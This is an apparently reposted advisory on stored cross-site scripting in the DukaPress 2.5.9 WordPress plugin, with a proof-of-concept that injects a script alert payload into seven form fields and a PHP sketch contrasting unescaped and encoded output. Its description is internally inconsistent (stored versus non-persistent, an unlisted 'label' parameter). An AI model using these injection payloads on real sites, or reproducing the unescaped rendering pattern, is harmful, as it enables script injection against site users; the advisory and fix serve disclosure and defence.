WordPress Plugin DukaPress 2.5.9 – Cross Site Scripting Vulnerability

A stored cross-site scripting vulnerability has been discovered in the official DukaPress WordPress plugin web application. The non-persistent vulnerability allows remote attackers to inject their own malicious script code into client-side browser requests of the application. The client-side cross-site scripting vulnerability is located in the `label` value of the page module’s GET method request.

(Copy of the Vendor Homepage: http://dukapress.org/)

Vulnerable Service(s):
[+] DukaPress Plugin (WordPress)

Vulnerable Module(s):
[+] Input

Vulnerable Parameter(s):
[+] price
[+] new_price
[+] currently_in_stock
[+] item_weight
[+] digital_file
[+] affiliate_url
[+] delete1

Date of Discovery:
==================

2015-09-21

Exploitation Technique:
=======================

Remote

Platform Tested:
===============

Windows 7

Risk Level:

Proof of Concept (PoC):
=======================

<table>
<td><input id="price" name="price" value=""'/>><script>alert("xss")</script>" type="text"></td>
<td><input id="new_price" name="new_price" value=""'/>><script>alert("xss")</script>" type="text"></td>
<td><input id="currently_in_stock" name="currently_in_stock" value=""'/>><script>alert("xss")</script>" type="text"></td>
<td><input id="item_weight" name="item_weight" value=""'/>><script>alert("xss")</script>" type="text"></td>
<td><input id="digital_file" name="digital_file" value=""'/>><script>alert("xss")</script>" type="text"></td>
<td><input id="affiliate_url" name="affiliate_url" value=""'/>><script>alert("xss")</script>" type="text"></td>
</table>
<div id="dp_deletestring"><a href="#" id="1">Delete</a>
<input id="delete1" name="delete1" value=""'/>><script>alert("xss")</script>" type="hidden"></div>
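
The PoC markup above shows the submitted value closing the `value` attribute early. As an added example (not DukaPress code and not from the advisory's author), this PHP sketch renders the listed fields with and without attribute encoding and adds a validation step on save. The function names, the assumption that four of the fields are numeric, and the use of `htmlspecialchars()` in place of WordPress's `esc_attr()` are assumptions for illustration.

```php
<?php
// Added illustration, not DukaPress source; function names are hypothetical.

// Field names from the advisory's "Vulnerable Parameter(s)" list.
const TEXT_FIELDS = ['price', 'new_price', 'currently_in_stock',
                     'item_weight', 'digital_file', 'affiliate_url'];
// Assumption: these four hold plain numbers, so they can be validated on save.
const NUMERIC_FIELDS = ['price', 'new_price', 'currently_in_stock', 'item_weight'];

// Unsafe pattern: the saved value is concatenated straight into the attribute.
function render_unsafe(string $name, string $value): string
{
    return "<td><input id=\"$name\" name=\"$name\" value=\"$value\" type=\"text\"></td>";
}

// Hardened pattern: encode for the attribute context at output time.
// In WordPress use esc_attr(); htmlspecialchars() stands in so this runs alone.
function render_safe(string $name, string $value): string
{
    $enc = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<td><input id=\"$name\" name=\"$name\" value=\"$enc\" type=\"text\"></td>";
}

// Second layer: reject non-numeric input for numeric fields before storing it.
function accept_on_save(string $name, string $value): bool
{
    return !in_array($name, NUMERIC_FIELDS, true) || is_numeric($value);
}

// Value taken from the advisory's proof of concept.
$poc = '"\'/>><script>alert("xss")</script>';

foreach (TEXT_FIELDS as $field) {
    $unsafe = render_unsafe($field, $poc);
    $safe   = render_safe($field, $poc);
    printf("%-18s unsafe has <script>: %-3s safe has <script>: %-3s accepted on save: %s\n",
        $field,
        stripos($unsafe, '<script') !== false ? 'yes' : 'no',
        stripos($safe, '<script') !== false ? 'yes' : 'no',
        accept_on_save($field, $poc) ? 'yes' : 'no');
}

// The encoded form keeps the whole value inside the attribute.
echo render_safe('price', $poc), "\n";
```

Output encoding is the control that closes the issue for every field, including free-text ones such as `digital_file` and `affiliate_url`; the numeric check only narrows what can be stored.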

 
